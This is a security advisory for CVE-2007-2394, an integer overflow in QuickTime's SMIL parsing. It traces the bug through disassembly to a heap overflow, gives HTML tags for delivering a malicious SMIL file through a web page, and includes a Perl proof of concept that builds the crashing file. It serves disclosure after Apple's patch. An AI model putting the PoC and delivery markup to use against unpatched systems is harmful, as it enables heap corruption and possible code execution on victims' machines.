======================================================================
Apple QuickTime integer overflow vulnerability when parsing SMIL file
======================================================================

Date:           09/03/2007
Author:         David Vaartjes <d.vaartjes at gmail.com>
Identifier:     CVE-2007-2394
Revision:       0.2

----------------------------------------------------------------------
AFFECTED VERSIONS
----------------------------------------------------------------------

Researched on QuickTime 7.1.3 running on Windows 2000 SP4.

iDefense confirmed the existence of this vulnerability in version
7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime
binaries for Windows XP and Vista are identical, this issue will
affect QuickTime running on Windows Vista also.

----------------------------------------------------------------------
FIXED VERSIONS
----------------------------------------------------------------------

Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS
X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this
issue. See [2] for additional information about this update.

QuickTime 7.2 is not available for the Windows 2000 platform.
Presumably, Apple dropped support for this platform.

----------------------------------------------------------------------
PRODUCT DESCRIPTION
----------------------------------------------------------------------

QuickTime is Apple's media player product. According to Apple,
QuickTime is downloaded over 10 million times a month. According to
Secunia, QuickTime is currently installed on over 50% of PCs [3].

The Synchronized MultiMedia Integration Language (SMIL) provides a
high-level scripting syntax for describing multimedia presentations.
SMIL files are text files that use XML-based syntax to specify what
media elements to present and where and when to present them.

----------------------------------------------------------------------
VULNERABILITY DESCRIPTION
----------------------------------------------------------------------

An integer overflow vulnerability exists in a part of QuickTime.qts
that calculates the size of a buffer that stores the title and author
fields of a SMIL file. This can be exploited to overflow that heap
buffer with user supplied content, which eventually can result in the
execution of arbitrary code.

----------------------------------------------------------------------
VULNERABILITY DETAILS
----------------------------------------------------------------------

The integer overflow can be triggered by creating a SMIL file
containing a title and author field of a specific length.

--
<smil>
<head>
  <meta name="title" content="specific-length"/>
  <meta name="author" content="specific-length"/>
</head>
</smil>
--

When such a SMIL file is parsed the length value of the author field
is stored in a short int data type (16 bit) without bounds checking.
In sub_66952B50(), this value is (sign) extended to a long int data
type (32 bit).

--
66952C9A        push    eax
66952C9B        call    sub_668B57D0
66952CA0  -->   movsx   eax, word ptr [esp+2Ch+var_C]
66952CA5        mov     edx, [esp+2Ch+arg_4]
66952CA9        lea     ecx, [esp+2Ch+var_10]
--

So, when the length of the author field is >= 0x8000 bytes, it will be
extended to a length value between 0xffff8000 and 0xffffffff.

Next, in sub_668DCFD0() the sign extended length of the author field
is added to the length of the title field + 0x20:

--
668DD04D        jnz     short loc_668DD0A0
668DD04F        test    ebx, ebx
668DD051        jz      loc_668DD1EB
668DD057  -->   lea     eax, [edi+ebx]  // edi holds the length of
                                        // the title field + 0x20.
                                        // ebx holds the sign
                                        // extended length of the
                                        // author field.
668DD05A        push    eax
668DD05B        push    ecx
--

In sub_668DCA60(), 4 is added to the result of the calculation:

--
668DCB37        test    edi, edi
668DCB39        jz      short loc_668DCB40
668DCB3B  -->   lea     eax, [edi+4]    // edi holds the result
668DCB3E        jmp     short loc_668DCB42
--

Next, in sub_668F5550() the final length value is used as the dwBytes
argument in a call to HeapRealloc():

--
668F555E        push    eax             // dwBytes (user specified)
668F555F        push    ecx             // lpMem
668F5560        push    1               // dwFlags
668F5562        push    edx             // hHeap
668F5563  -->   call    ds:HeapReAlloc
--

This allows for the allocation of a controlled amount of memory. For
example, when setting the length of the author field to 0xff00 (65280)
and the length of the title field to 0xdf (223), the following
situation occurs:

1: sub_66952B50():

0x0000ff00 will be sign extended to 0xffffff00.

2: sub_668DCFD0():

0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00
resulting in a length value of 0xffffffff.

3: sub_668DCA60():

0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003.

4: sub_668F5550():

HeapRealloc() will allocate 0x00000003 bytes of memory.

Next, the pointer returned by HeapRealloc() is used by sub_668DCFD0()
as the dest argument in a call to memcpy():

--
668DD08E        push    ebx             // count, length value right
                                        // after sign extension
                                        // (0xffffff00).
668DD08F        push    edx             // src, buffer with user
                                        // supplied (author) content.
668DD090        add     eax, esi
668DD092  -->   push    eax             // dest, 3 byte buffer.
668DD093        call    _memcpy
668DD098        add     esp, 18h
668DD09B        jmp     loc_668DD1E5
--

This copy action will result in an overflow of the 3 byte heap
buffer with data from the author field (user supplied). Due to the
large amount of data written, this will finally result in an access
violation when memory is read or written outside the heap page. The
exception is handled by the program and execution continues with a
corrupt heap.

For my platform (win2k), when a call to HeapAlloc() is executed the
unlink code of ntdll will "fail" because we have overwritten pointers
in the heap management structures of other heap buffers with our data.
The status of the registers during unlinking is:

--
EAX 78787878 <-- user supplied
ECX 78787878 <-- user supplied
EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
EBX 00000078
ESP 0012EDC8
EBP 0012EF84
ESI 01200000
EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
--

--
77f867e6        mov dword ptr ds:[ecx],eax
77f867e8        mov dword ptr ds:[eax+4],ecx
--

The unlink instructions will result in the following exception:

---------------------------
QuickTimePlayerMain: QuickTimePlayer.exe

"The instruction at "0x77f867e6" referenced memory at "0x78787878".
The memory could not be "written"
---------------------------

This shows that we are able to overwrite 4 bytes anywhere in the
address space of the process with "any" 4 byte value we want, which
can for example be exploited to overwrite function pointers like the
SEH or UEF to gain control of the process. This 4 byte overwrite via
the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking"
is used on these platforms.

----------------------------------------------------------------------
ATTACK VECTORS
----------------------------------------------------------------------

This vulnerability can be triggered by luring a target user into
running a malicious SMIL file locally or via a webpage. In the later
scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used:

<OBJECT
  CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
  CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"
  WIDTH="10" HEIGHT="10" >
  <!-- malicious SMIL file -->
  <PARAM NAME="src" VALUE="poc.smil" />
  <EMBED
    <!-- available .qtif or .mov file to start up QT for FF -->
    SRC="available-sample.qtif"
    <!-- malicious SMIL file -->
    QTSRC="poc.smil"
    WIDTH="10" HEIGHT="10"
    PLUGINSPAGE="www.apple.com/quicktime/download"
    TYPE="video/quicktime"
  />
</OBJECT>

----------------------------------------------------------------------
PROOF OF CONCEPT
----------------------------------------------------------------------

#!/usr/bin/perl -w

####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes <d.vaartjes at gmail.com>
####

$file = "poc.smil";
$padd = "x";
$cop_len = 36;

####
# By choosing the following lengths the
# integer overflow will be triggered.
####

$tit_len = 223;
$auth_len = 65280;

open(FH,">$file") or die "Can't open file:$!";

print FH
 "<smil>\n".
 "<head>\n".
 " <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n".
 " <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n".
 " <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n".
 "</head>\n".
 "</smil>";

close(FH);

----------------------------------------------------------------------
REFERENCES
----------------------------------------------------------------------

[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?
id=556
[2] http://docs.info.apple.com/article.html?artnum=305947
[3] http://secunia.com/blog/7/

----------------------------------------------------------------------
DISCLOSURE TIMELINE
----------------------------------------------------------------------

04/02/2007    Initial vendor notification (by iDefense)
04/09/2007    Initial vendor response
07/11/2007    Apple security bulletin & patches available
07/11/2007    Public disclosure of iDefense advisory
09/03/2007    Public disclosure of this advisory